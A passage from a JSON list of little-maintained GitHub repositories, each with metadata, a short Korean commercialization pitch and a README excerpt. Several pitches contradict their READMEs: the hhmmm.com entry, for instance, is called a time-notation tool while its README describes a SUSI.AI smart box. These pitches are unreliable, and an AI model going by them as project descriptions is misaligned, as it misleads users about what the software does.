Boom](https://www.toonboom.com/), [Rive](https://rive.app/), [Blender](https://blender.org/), [Synfig Studio](https://www.synfig.org/), [Haiku Animator](https://www.haikuanimator.com/), [Keyshape](https://www.keyshapeapp.com/), [Glaxnimate](https://glaxnimate.mattbas.org/), [Enve](https://maurycyliebner.github.io/index) etc: If you're on a Chromebook you have [Animatron Studio](https://www.animatron.com/studio/), [TweenUI](https://tweenui.com/animator/), [Wick Editor](https://www.wickeditor.com/), [Expressive Animator](https://www.expressivesuite.com/), and even [aniGen](http://anigen.org/) but mobile users have been left in the dark far too long. That's why I decided to build [svgMotion](https://mic","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"kennethreitz/httpbin","github_url":"https://github.com/kennethreitz/httpbin","stars":7,"language":"","license":"isc","abandonment_months":27,"description":"# httpbin 저장소 분석\n\n## 왜 보물인가\n웹 개발자들이 자신의 프로그램을 테스트할 때 필요한 \"테스트용 연습 서버\" 역할을 하는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **API 테스트 플랫폼 SaaS**: 개발자들이 자신의 프로그램이 올바르게 작동하는지 확인하는 온라인 검사 도구로 판매\n2. **개발사 내부 도구**: 회사 개발팀이 새 기","readme_excerpt":"# httpbin(1): HTTP Request & Response Service\n\n\nA [Kenneth Reitz](http://kennethreitz.org/bitcoin) Project.\n\n![ice cream](http://farm1.staticflickr.com/572/32514669683_4daf2ab7bc_k_d.jpg)\n\nRun locally:\n```sh\ndocker pull kennethreitz/httpbin\ndocker run -p 80:80 kennethreitz/httpbin\n```\n\nSee http://httpbin.org for more information.\n\n## Officially Deployed at:\n\n- http://httpbin.org\n- https://httpbin.org\n- https://hub.docker.com/r/kennethreitz/httpbin/\n\n\n## SEE ALSO\n\n- http://requestb.in\n- http://python-requests.org\n- https://grpcb.in/\n\n## Build Status\n\n[![Build Status](https://travis-ci.org/requests/httpbin.svg?branch=master)](https://travis-ci.org/requests/httpbin)\n","composite_score":0.3004,"license_safety_tag":"safe"},{"name":"loklak/loklak_jlib_api","github_url":"https://github.com/loklak/loklak_jlib_api","stars":12,"language":"Java","license":"lgpl-2.1","abandonment_months":107,"description":"# loklak/loklak_jlib_api 가치 분석\n\n## 왜 보물인가\n소셜 미디어와 뉴스 데이터를 쉽게 수집·활용할 수 있는 검색 도구로, 데이터 기반 의사결정이 필요한 기업들의 필수 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **마케팅 분석 SaaS**: 브랜드 모니터링, 고객 감정 분석, 경쟁사 추적을 자동화하는 구독형 서비스\n2.","readme_excerpt":"# loklak_jlib_api\n[![Build Status](https://api.travis-ci.org/loklak/loklak_jlib_api.svg)](https://travis-ci.org/loklak/loklak_jlib_api)\n\nThis is the Loklak Java API.\nOne Library to find them, One Library to bring them all.\n\n## What is loklak?\nLoklak server scrapes data from multiple social networking websites, primarily from Twitter. The \nscraped data is open and can be accessed by anyone without the need of an API key!!! For more \nplease visit [http://loklak.org](http://loklak.org).\n\n## What can I do with it?\nYou can anonymously use the data provided by Loklak server using this library. Currently it \nsupports the following API endpoints:\n* [search](http:loklak.org/api.html#search)\n* [suggest](http:loklak.org/api.html#suggest)\n* [peers](http:loklak.org/api.html#peers)\n* [hello](http:loklak.org/api.html#hello)\n* [crawler](http:loklak.org/api.html#crawler)\n* [status](http:loklak.org/api.html#status)\n* [user](http:loklak.org/api.html#user)\n* [apps](http:loklak.org/api.html#apps)\n* [push](","composite_score":0.3004,"license_safety_tag":"restricted"},{"name":"loklak/loklak_nodejs_api","github_url":"https://github.com/loklak/loklak_nodejs_api","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":101,"description":"# loklak_nodejs_api 분석 보고서\n\n## 왜 보물인가\n소셜 미디어 데이터를 쉽게 수집하고 분석할 수 있는 도구로, 마케팅이나 여론 조사가 필요한 기업들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 소셜 미디어 모니터링 플랫폼**\n- 기업이 자신의 브랜드에 대한 온라인 반응을 실시간으로 추적하는 구독형 서비스로 제공\n","readme_excerpt":"# Loklak API\n[![Build Status](https://travis-ci.org/loklak/loklak_nodejs_api.svg?branch=master)](https://travis-ci.org/loklak/loklak_nodejs_api)\n[![Code Climate](https://codeclimate.com/github/sudheesh001/loklak-node/badges/gpa.svg)](https://codeclimate.com/github/sudheesh001/loklak-node)\n[![Dependency Status](https://gemnasium.com/badges/github.com/loklak/loklak_nodejs_api.svg)](https://gemnasium.com/github.com/loklak/loklak_nodejs_api)\n\nNode.js wrapper for loklak.org API - [distributed tweet search server](https://github.com/loklak/loklak_server)\n## Install\n```\nnpm install --save loklak\n```\n## Using\n```\nvar loklak = require('loklak');\n```\n### Status\n```\nloklak.status(function (data) {\n  console.log(data);\n});\n```\n### Hello\n```\nloklak.hello(function (data) {\n  console.log(data);\n});\n```\n### Peers\n```\nloklak.peers(function (data) {\n  console.log(data);\n});\n```\n### Geocode\n```\nloklak.geocode(['Votkinsk'], function (data) { console.log(data); })\n```\n### Users\n```\nloklak.user({name: 'seva","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"alexellis/helm3-expressjs-tutorial","github_url":"https://github.com/alexellis/helm3-expressjs-tutorial","stars":6,"language":"","license":"unknown","abandonment_months":79,"description":"# alexellis/helm3-expressjs-tutorial 분석\n\n## 왜 보물인가\n웹 애플리케이션을 클라우드에 배포하는 과정을 단계별로 배울 수 있는 실습 자료로, 현대적인 웹 서비스 운영 방식을 이해하는 첫걸음이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 튜토리얼을 기반으로 한 '웹앱 배포 자동화 플랫폼' 개발 및 판매","readme_excerpt":"# Guide to Helm 3 with an Express.js microservice\n\nIn this guide you'll learn how to create a Helm Chart with Helm 3 for an [Express.js](https://expressjs.com) microservice.\n\nDevelopers adopting [Kubernetes](https://kubernetes.io) often turn to [helm](https://helm.sh) to find pre-packaged software with a single command. Software is packaged in charts which allows for customization at install time and for lifecycle management such as upgrades and removal of software.\n\n## Helm 2 is dead, long live Helm 3!\n\nUp until recently Helm 2 also shipped with a server side component called `tiller`. Unfortunately `tiller` was insecure by default and left many clusters vulnerable to attack. Steps were published by the project maintainers to manually lock-down access, but it was too late and so there is now a mix of helm lovers and haters in the world.\n\nHelm 3 aims to consolidate developers by simply removing the `tiller` component. The logic that controlled updates and removal is now run at the clie","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"loklak/loklak_php_api","github_url":"https://github.com/loklak/loklak_php_api","stars":12,"language":"PHP","license":"unknown","abandonment_months":102,"description":"# loklak_php_api 평가 보고서\n\n## 왜 보물인가\n소셜 미디어 데이터를 쉽게 수집하고 활용할 수 있는 도구로, 마케팅, 여론 조사, 트렌드 분석이 필요한 기업들에게 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 모니터링 SaaS**: 기업들이 자신의 브랜드 평판을 실시간으로 추적하고 고객 반응을 분석하는 구독형 서비스\n2. *","readme_excerpt":"# Loklak PHP\n\n[![Build Status](https://travis-ci.org/loklak/loklak_php_api.svg?branch=master)](https://travis-ci.org/loklak/loklak_php_api)\n[![Coverage Status](https://coveralls.io/repos/github/loklak/loklak_php_api/badge.svg?branch=master)](https://coveralls.io/github/loklak/loklak_php_api?branch=master)\n[![Dependency Status](https://gemnasium.com/badges/github.com/loklak/loklak_php_api.svg)](https://gemnasium.com/github.com/loklak/loklak_php_api)\n\nThis is the PHP Client and PHP API for accessing the Loklak API\nIt contains a series of calls that could be directly used for the requested JSON responses\n\nThis library is bundled with Requests library in PHP keeping it standalone and works by just plugging it into the `lib/` folder.\n\nThis is intended to be the generic PHP request library to loklak for integration into PHP websites and CMS frameworks like wordpress, drupal, joomla etc..,\n\n## How to run PHPUnit tests?\n\n### *AMP Solution Stack or Command Line Users\n\nInstall `PHPUnit` using `p","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/knitserver","github_url":"https://github.com/fossasia/knitserver","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":112,"description":"# KnitServer 프로젝트 분석\n\n## 왜 보물인가\n손뜨개질 패턴을 디지털로 설계하고 공유할 수 있는 전문 플랫폼으로, 전 세계 손뜨개질 애호가들의 창작 활동을 지원합니다.\n\n## 어디에 쓸 수 있나\n1. **손뜨개질 커뮤니티 플랫폼**: 사용자들이 자신의 패턴을 업로드·다운로드하고 피드백을 주고받는 SaaS 서비스\n2. **패턴 설계 도구 API**","readme_excerpt":"# knitserver\n\n## 1. What is Knit Server\nKnitserver is a Knitlib client that provides REST API endpoints for Knitting Machine software and control. Knitserver is designed to interact with [Knitweb](https://github.com/fashiontec/knitweb)\n\n## 2. How to install Knit-Server\n### 2.1 Requirements\nKnitlib Web requires the Knitlib library to be installed and Flask as main dependencies. Check requirements.txt for more.\n### 2.2 Step by Step Installation\n\nCurrently there is not a packaged version of Knitserver, however it is quite easy to get up and running.\n\n1. Download the Source Code (either git clone this repository or download a zip or tar).\n2. Browse the repo (and optional, setup a virtual enviroment: virtualenv venv )\n3. Install the dependencies from requirements.txt ( pip install -r requirements.txt )/if you are using any proxy run: sudo pip install --proxy=\"http://Your proxy:port\" -r requirements.txt\n\n4. Run the server: python knitlib_webserver.py or run.sh\n\n## 3. Knit Server API\nKnitlib ","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-blog","github_url":"https://github.com/fossasia/fossasia-blog","stars":11,"language":"","license":"gpl-2.0","abandonment_months":103,"description":"# FOSSASIA 블로그 저장소 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티의 활동과 소식을 한 곳에 모아 공유할 수 있는 블로그 플랫폼으로, 기술 정보 전달의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 오픈소스 프로젝트 소식을 자동으로 수집·정렬하는 기술 뉴스레터 구독 서비스\n2. **내부 업무 도구**: 기술 커뮤니티","readme_excerpt":"# blog.fossasia.org\n\nThe FOSSASIA Blog is running Wordpress at https://blog.fossasia.org.\n\nPlease use our issue tracker here https://github.com/fossasia/blog.fossasia.org/issues.\n\n## Communication\n\nAny questions or issues? The best place to start is the main Gitter channel at https://gitter.im/fossasia/fossasia.\n","composite_score":0.3004,"license_safety_tag":"restricted"},{"name":"fossasia/timeline.api.fossasia.net","github_url":"https://github.com/fossasia/timeline.api.fossasia.net","stars":11,"language":"JavaScript","license":"cc0-1.0","abandonment_months":125,"description":"# Timeline API 프로젝트 평가\n\n## 왜 보물인가\n역사적 사건들을 시간순으로 정렬하여 보여주는 기능을 누구나 쉽게 만들 수 있도록 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼**: 학생들이 역사, 과학, 문학의 주요 사건들을 타임라인으로 시각화하여 학습하는 온라인 강의 서비스\n2. **기업 문서화 도구**: 회사의 성장","readme_excerpt":"Community Timeline\n===========\nA flexible jQuery plugin to embed FOSSASIA community timeline to your website.\n\n[![Join the chat at https://gitter.im/fossasia/api.fossasia.net](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/api.fossasia.net?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## How to use\n\n* Clone the repo \n\n```\ngit clone https://github.com/fossasia/timeline.api.fossasia.net lib\n```\n\n* Include css & js files in html page, prepare a blank div, and call library initializer\n\n```html\n<head>\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"lib/malihu-scrollbar/jquery.mCustomScrollbar.min.css\" />\n  <link rel=\"stylesheet\" type=\"text/css\" href=\"lib/timeline.css\"/>\n</head>\n<div id=\"timeline-id\"></div>\n\n<script src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js\"></script>\n<script src=\"lib/malihu-scrollbar/jquery.mCustomScrollbar.concat.min.js\"></script>\n<script src=\"lib/timeline.js\"></script>\n<script>\n  var options =","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"loklak/loklak_dotnet_api","github_url":"https://github.com/loklak/loklak_dotnet_api","stars":12,"language":"C#","license":"unknown","abandonment_months":102,"description":"# loklak_dotnet_api 상용화 분석\n\n## 왜 보물인가\n트위터 같은 소셜 미디어의 데이터를 쉽게 수집하고 분석할 수 있게 해주는 도구로, 마케팅이나 여론 조사가 필요한 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 분석 SaaS**: 기업들이 자사 브랜드에 대한 온라인 평판을 모니터링하고 경쟁사 분석을 하는 서비스","readme_excerpt":"# LoklakDotNet\n\n[![Build Status](https://travis-ci.org/loklak/loklak_dotnet_wrapper.svg?branch=master)](https://travis-ci.org/loklak/loklak_dotnet_wrapper)\n\nThis is the .NET API wrapper for the Loklak server (http://loklak.org).\n\n##Installation\nTo install LoklakDotNet, run the following command in the Package Manager Console.\n\n`Install-Package LoklakDotNet`\n\nYou can also search for `loklak` in the Nuget Package Manager.\n\n###Supported Platforms\n\n\n1. .NET Framework 4.5\n2. ASP.NET Core 5.0\n3. Windows 8/8.1\n4. Windows Universal (UWP)\n5. Windows Phone 8.1\n6. Windows Phone Silverlight 8.1\n7. Xamarin.Android\n8. Xamarin.iOS\n9. Xamarin.iOS (Classic)\n\n##How to use\nSee the LoklakDotNetTests project for usage examples. async/await pattern is followed. All methods output the raw JSON string response. Parse the JSON using a JSON parser of your choice. Examples in LoklakDotNetTests use Newtonsoft.JSON.\nFor documentation on the API, go [here](http://loklak.org/api.html).\n\n<a name='contents'></a>\n# Con","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/feed.api.freifunk.net","github_url":"https://github.com/fossasia/feed.api.freifunk.net","stars":11,"language":"PHP","license":"unknown","abandonment_months":140,"description":"# fossasia/feed.api.freifunk.net 분석\n\n## 왜 보물인가\n전 세계 무료 와이파이 네트워크(Freifunk)의 정보를 한 곳에서 모아 제공하는 데이터 플랫폼으로, 지역 인터넷 커뮤니티 운동을 기술적으로 지원할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **무료 와이파이 맵 서비스**: 지도에 주변 Freifunk 네트워크 위치","readme_excerpt":"Anwendungen\n===========\n\nFreifunk Community Map\n----------------------\n\nEin Beispiel gibt es hier: http://weimarnetz.de/ffmap/map.html\n\nFreifunk Community Feed Merger\n------------------------------\n\nBlogfeeds werden hier zusammengefast: http://weimarnetz.de/fffeed/feed.php\n\n\nEntstehung\n==========\n\nZum Wireless Community Weekend 2013 in Berlin fand ein ersten Treffen\nzum Relaunch unserer Website freifunk.net statt. Dabei kam auch die\nFrage auf, wie man die einzelnen Freifunkcommunities am besten\npräsentieren kann, ohne alle Daten zentral zu erfassen und zudem den\nCommunities eine einfache Möglichkeit zu bieten, eigene Daten selbst\naktuell zu halten.\n\nIn Anlehnung an die Hackerspaces API (http://hackerspaces.nl/spaceapi/)\nwurde die Idee einer Freifunk API geboren: Jede Community stellt ihre\nDaten in einem definierten Format an einer ihr zugänglichen Stelle\n(Webspace, Wiki, Webserver) bereit und trägt sich in das Verzeichnis\nein. Das Verzeichnis besteht lediglich aus einer Zuordnung von\nC","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"pedroborges/kirby-fuzzy-search","github_url":"https://github.com/pedroborges/kirby-fuzzy-search","stars":14,"language":"PHP","license":"unknown","abandonment_months":89,"description":"# Kirby Fuzzy Search 상용화 분석\n\n## 왜 보물인가\n웹사이트의 검색 기능을 '대충' 찾아도 정확한 결과를 보여주는 똑똑한 검색 도구로, 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 제조업체의 제품 카탈로그 검색 기능 → 제품명을 정확히 몰라도 비슷한 것을 찾아주는 온라인 쇼핑몰 ","readme_excerpt":"# Kirby Fuzzy Search (Beta) [![Release](https://img.shields.io/github/release/pedroborges/kirby-fuzzy-search.svg)](https://github.com/pedroborges/kirby-fuzzy-search/releases) [![Issues](https://img.shields.io/github/issues/pedroborges/kirby-fuzzy-search.svg)](https://github.com/pedroborges/kirby-fuzzy-search/issues)\n\nFuzzy-search plugin for Kirby. Looking for approximate matches of search queries in your content has never been this easy.\n\nThis is plugin is built on top of the [fuzzget](https://gitlab.com/kevinfiol/fuzzget) PHP library.\n\n## Basic Usage\nIf you are already using the Kirby built-in `search` method, replacing it with Fuzzy Search is just a matter of renaming a method on a pages collection:\n\n```diff\n$query    = get('q');\n$articles = page('blog')\n    ->children()\n    ->visible()\n-   ->search($query, 'title|text');\n+   ->fuzzySearch($query, 'title|text');\n```\n\nFuzzy Search **is not** compatible with any of the other options available on the Kirby `search` method.\n\nWith Fuzzy S","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"ShabanKamell/android-navigator","github_url":"https://github.com/ShabanKamell/android-navigator","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":78,"description":"# android-navigator 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면 이동을 간편하게 만들어주는 도구로, 앱 개발자들의 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 초보자용 템플릿 플랫폼으로 제공하여 누구나 쉽게 화면 전환 기능을 추가할 수 있게 함\n2. **내부 업무 도","readme_excerpt":"\n\n# Android Navigator\n\n[![Android Arsenal]( https://img.shields.io/badge/Android%20Arsenal-Navigator-green.svg?style=flat )]( https://android-arsenal.com/details/1/6514 ) [![](https://jitpack.io/v/ShabanKamell/Navigator.svg)](https://jitpack.io/#ShabanKamell/Navigator)\n\nA simple wrapper for Android navigation that helps you get rid of a lot of boilerplate code.\n\n<img src=\"https://github.com/ShabanKamell/Navigator/blob/master/blob/raw/logo.png\" height=\"250\">\n\n## Install\n\n#### Gradle:\n```groovy\nallprojects {\n    repositories {\n        ...\n        maven { url \"https://jitpack.io\" }\n    }\n}\n\ndependencies {\n       implementation 'com.github.ShabanKamell:Navigator:x.y.z'\n}\n\n```\n(Please replace x, y and z with the latest version numbers:  [![](https://jitpack.io/v/ShabanKamell/Navigator.svg)](https://jitpack.io/#ShabanKamell/Navigator))\n\n\n# Usage\n\n## Modular Navigation\n\nNavigator supports Fragment/Activity navigation\n\n#### Activity\n```kotlin\n// Declare Addresable Activity\nobject Profile: Addr","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"SolraBizna/MacLua5.3","github_url":"https://github.com/SolraBizna/MacLua5.3","stars":18,"language":"C","license":"unknown","abandonment_months":35,"description":"# MacLua5.3 상용화 분석\n\n## 왜 보물인가\nmacOS에서 Lua라는 프로그래밍 언어를 쉽게 사용할 수 있도록 만든 도구로, 게임 개발사나 자동화 업무가 많은 회사들이 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: macOS 사용자를 위한 스크립팅 자동화 플랫폼 (일일 반복 작업 자동화 서비스)\n2. **내부 업무","readme_excerpt":"What is this?\n=============\n\nThis is a \"proper\" port of Lua 5.3 to the greatest, most modern operating system in the world: Classic MacOS!\n\nRequirements\n============\n\n- 68020 or better\n- At least 1MB of memory\n- System 7.1.2 or later\n- CFM-68K Runtime Enabler (not required on PowerPC)\n\nLua Engine\n==========\n\nDrag the \"Lua 5.3 Engine\" onto the System Folder and it will be available to applications on your system.\n\nLua Interpreter\n===============\n\nThis application will execute any Lua script that you drag onto it. If the creator code of the script is set to `'Lua!'`, you can double-click the script as well.\n\nIt uses SIOW to present text input and output.\n\n![A screenshot of the Lua REPL, as seen within the Lua Interpreter application.](ReadmeImages/app.png)\n\nMPW Tools\n=========\n\nIf you have MPW or ToolServer, drop the \"Lua\" and \"LuaC\" files into its Tools directory. These allow you to use the respective commands in the respective environments.\n\nAll the usual command line options and featu","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"vinniefalco/json","github_url":"https://github.com/vinniefalco/json","stars":19,"language":"C++","license":"BSL-1.0","abandonment_months":40,"description":"","readme_excerpt":"[![Boost.JSON](https://raw.githubusercontent.com/CPPAlliance/json/master/doc/images/repo-logo-3.png)](http://master.json.cpp.al/)\n\nBranch          | [`master`](https://github.com/CPPAlliance/json/tree/master) | [`develop`](https://github.com/CPPAlliance/json/tree/develop) |\n--------------- | ----------------------------------------------------------- | ------------------------------------------------------------- |\n[Azure](https://azure.microsoft.com/en-us/services/devops/pipelines/) | [![Build Status](https://img.shields.io/azure-devops/build/vinniefalco/2571d415-8cc8-4120-a762-c03a8eda0659/8/master)](https://vinniefalco.visualstudio.com/json/_build/latest?definitionId=5&branchName=master) | [![Build Status](https://img.shields.io/azure-devops/build/vinniefalco/2571d415-8cc8-4120-a762-c03a8eda0659/8/develop)](https://vinniefalco.visualstudio.com/json/_build/latest?definitionId=8&branchName=develop)\nDocs            | [![Documentation](https://img.shields.io/badge/docs-master-brightgree","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"lingobus/mpa-vue-template","github_url":"https://github.com/lingobus/mpa-vue-template","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":92,"description":"# lingobus/mpa-vue-template 분석 보고서\n\n## 왜 보물인가\n웹사이트를 쉽게 만들 수 있도록 미리 준비된 틀(템플릿)이라, 개발자들이 처음부터 다시 만드는 수고를 덜 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 다중 페이지 웹 대시보드를 신속하게 구축할 때 기반 템플릿으로 사용\n2. **내부 업무 ","readme_excerpt":"A Multi-page Vue project template\n====\n\nWrite Vue SPA, React SPA, traditional web page with jQuery in one project\n\n- Include Vue, Vuex, Vue-router, axios\n- Jade for both page and Vue SFC\n- Stylus for both page and Vue SFC\n- Proxy and API mock supported\n- Vue i18n supported\n- React supported\n- ElementUI\n\n\nInstall\n====\n```bash\n#init project\nvue init lingobus/mpa-vue-template <project-name>\ncd <project-name>\n\n#start dev server\nnpm start\n\n#build for production\nnpm run release\n```\n\nMore\n====\n[Yeoman Generators for vue-mpa-template generated projects](https://github.com/lingobus/generator-mpa)\n\nLicence\n====\nMozilla\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"sp4cerat/OutStar.VoxelGame","github_url":"https://github.com/sp4cerat/OutStar.VoxelGame","stars":10,"language":"C","license":"NOASSERTION","abandonment_months":80,"description":"","readme_excerpt":"# OutStar \n## A Voxel Raycasting Sandbox Game \n\nOutStar was developed in 2014. Its like Minecraft with integrated Voxel Sculting Editor to create new Blocks in 3D. The scene is rendered by a mix of triangles (OpenGL) and voxel raycasting (OpenCV).\n\n![OutStar.VoxelGame](https://github.com/sp4cerat/OutStar.VoxelGame/blob/master/screenshots/title.png?raw=true)\n\n\n### Usage:\n\nF1 Screenshot\n\nF2 Toggle Fullscreen\n\nF3 Game/Edit Mode\n\nF4 Sculpt Mode\n\nF5 Save Level\n\nF6 Load Level\n\nF7..F10 Set Resolution 1024x512..1920x1080\n\nTAB Toggle Edit/Game Mode\n\nSpace Jump\n\nwsad Move Player\n\nShift Run\n\nGame Mode:\n\nLMB : Will be shoot\n\nEdit Mode:\n\nLMB set block\n\nMMB Toggle Sculpting Tool\n\nRMB delete block\n\nWheel: change block\n\nHold the LMB/RMB and drag to set a larger area \n\nIn sculpting tool:\n\nAdd block to octree : adds a new block to the available list\n\n### Videos\n\n[![OutStar.VoxelGame](https://img.youtube.com/vi/tUyz-22KyXw/0.jpg)](https://www.youtube.com/watch?v=tUyz-22KyXw)\n\n[![OutStar.VoxelGame](https:","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/coc.fossasia.org","github_url":"https://github.com/fossasia/coc.fossasia.org","stars":11,"language":"CSS","license":"unknown","abandonment_months":82,"description":"# fossasia/coc.fossasia.org 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티가 안전하고 존중하는 문화를 만들기 위한 행동지침 템플릿으로, 전 세계 수천 개의 오픈소스 프로젝트가 필요로 하는 기본 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 커뮤니티 관리 플랫폼에서 자동으로 행동지침을 생성하고 맞춤형 버전을 제공하는 ","readme_excerpt":"[![Build Status](https://travis-ci.org/fossasia/labs.fossasia.org.svg?branch=gh-pages)](https://travis-ci.org/fossasia/labs.fossasia.org)\n\n##labs.fossasia.org\n\nCode of website: http://labs.fossasia.org\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"kwikius/ultrasonic_wind_sensor","github_url":"https://github.com/kwikius/ultrasonic_wind_sensor","stars":17,"language":"C++","license":"unknown","abandonment_months":27,"description":"# 초음파 풍속 센서 (Ultrasonic Wind Sensor)\n\n## 왜 보물인가\n바람의 속도와 방향을 측정하는 센서 기술로, 날씨 예측, 드론 안전 비행, 스마트 팜 같은 여러 분야에서 필수적인 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 농업 회사가 구독 기반으로 실시간 풍속 데이터를 받아 스프링클러 자동 제어 시스템 운","readme_excerpt":"\n\n# Ultrasonic Wind Speed and Direction Sensor from a car reversing kit and an Arduino.\n\n\nUltrasonic wind sensors are known for their accuracy and reliability. However they also tend to be quite expensive.\n\nThe Ultrasonic wind sensor described here can be built for around £20($20) and has excellent performance.\n\nThe main components of the project are an Ebay car reversing kit, available for around £9(10$US) and an arduino Pro Mini or clone for around 5$US.\n\nClick the below image to watch a video of the project on YouTube:\n\n[![Youtube - Ultrasonic Wind Speed and Direction Sensor from a car reversing kit](http://img.youtube.com/vi/_kloM0Tk8lo/2.jpg)](https://www.youtube.com/watch?v=_kloM0Tk8lo&list=PL-N-nQ0dVeh7bO8eM10oHQ2tNhluuLc5f \n\"Youtube - Ultrasonic Wind Speed and Direction Sensor from a car reversing kit\")\n\nFull details about building the electronics and mechanical hardware can be found at Hackaday.io\n\nhttps://hackaday.io/project/181677-wind-sensor-using-car-reversing-kit\n\nThe pro","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/2016.codeheat.org","github_url":"https://github.com/fossasia/2016.codeheat.org","stars":12,"language":"CSS","license":"unknown","abandonment_months":82,"description":"# fossasia/2016.codeheat.org 분석\n\n## 왜 보물인가\n개발자들의 오픈소스 기여를 게임처럼 경쟁하면서 배우고 보상받을 수 있는 플랫폼으로, 기술 교육과 커뮤니티 활성화를 동시에 해결합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 개발자 채용 플랫폼으로 지원자들의 실제 코딩 능력과 포트폴리오를 평가\n- **내부 업","readme_excerpt":"# Codeheat.org website\n\nIn the heat of the code is a coding contest run by FOSSASIA, friends and partners.\n\nOfficial website: http://codeheat.org\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"liudf0716/apfree_wifidog","github_url":"https://github.com/liudf0716/apfree_wifidog","stars":8,"language":"C","license":"gpl-3.0","abandonment_months":41,"description":"# apfree_wifidog 상용화 분석\n\n## 왜 보물인가\n누구나 사용할 수 있는 무료 와이파이 관리 시스템으로, 카페·병원·학교 같은 장소에서 손쉽게 안전한 무선 인터넷을 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 카페·펜션 운영자들이 매달 구독료를 내고 고객 관리, 접속 통제, 마케팅 기능을 갖춘 와이파이","readme_excerpt":"\n![ApFreeWiFiDog](https://user-images.githubusercontent.com/1182593/213065247-9a3cb0a5-dd08-4383-b217-b141ad32e88a.png)\n\n\n[![license][1]][2]\n[![PRs Welcome][3]][4]\n[![Issue Welcome][5]][6]\n[![Release Version][7]][8]\n[![OpenWRT][11]][12]\n[![Join the QQ Group][15]][16]\n\n\n[1]: https://img.shields.io/badge/license-GPLV3-brightgreen.svg?style=plastic\n[2]: https://github.com/liudf0716/apfree_wifidog/blob/master/COPYING\n[3]: https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=plastic\n[4]: https://github.com/liudf0716/apfree_wifidog/pulls\n[5]: https://img.shields.io/badge/Issues-welcome-brightgreen.svg?style=plastic\n[6]: https://github.com/liudf0716/apfree_wifidog/issues/new\n[7]: https://img.shields.io/badge/release-3.11.1716-red.svg?style=plastic\n[8]: https://github.com/liudf0716/apfree_wifidog/releases\n[11]: https://img.shields.io/badge/Platform-%20OpenWRT%20-brightgreen.svg?style=plastic\n[12]: https://github.com/openwrt\n[13]: https://img.shields.io/badge/KunTeng-Inside-blue.svg?s","composite_score":0.3004,"license_safety_tag":"restricted"},{"name":"fossasia/hhmmm.com","github_url":"https://github.com/fossasia/hhmmm.com","stars":11,"language":"","license":"unknown","abandonment_months":93,"description":"# fossasia/hhmmm.com 분석\n\n## 왜 보물인가\n시간 표기법을 재미있게 표현하는 창의적인 도구로, 디지털 제품의 사용자 경험을 향상시킬 수 있는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 업무 관리·일정 앱에서 시간 입력을 더 직관적으로 만드는 UI 컴포넌트로 제공\n- **내부 업무 도구**: 회사 근무 시간 기","readme_excerpt":"Smart Box for SUSI.AI\n\nhttps://susi.ai\n","composite_score":0.3004,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_publisher","github_url":"https://github.com/fossasia/loklak_publisher","stars":12,"language":"TypeScript","license":"unknown","abandonment_months":109,"description":"# Loklak Publisher 상용화 분석\n\n## 왜 보물인가\n소셜미디어 콘텐츠를 자동으로 수집하고 게시할 수 있는 도구로, 마케팅팀이 수작업으로 하던 반복 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 마케팅 에이전시를 위한 \"자동 소셜미디어 관리 플랫폼\" 구독 서비스\n2. **내부 업무 도구**: 대형","readme_excerpt":"# LoklakMessagePublisher\n[![Build Status](https://travis-ci.org/SarishiNoHara/message-publisher.svg?branch=master)](https://travis-ci.org/SarishiNoHara/message-publisher)\n\nThis project was 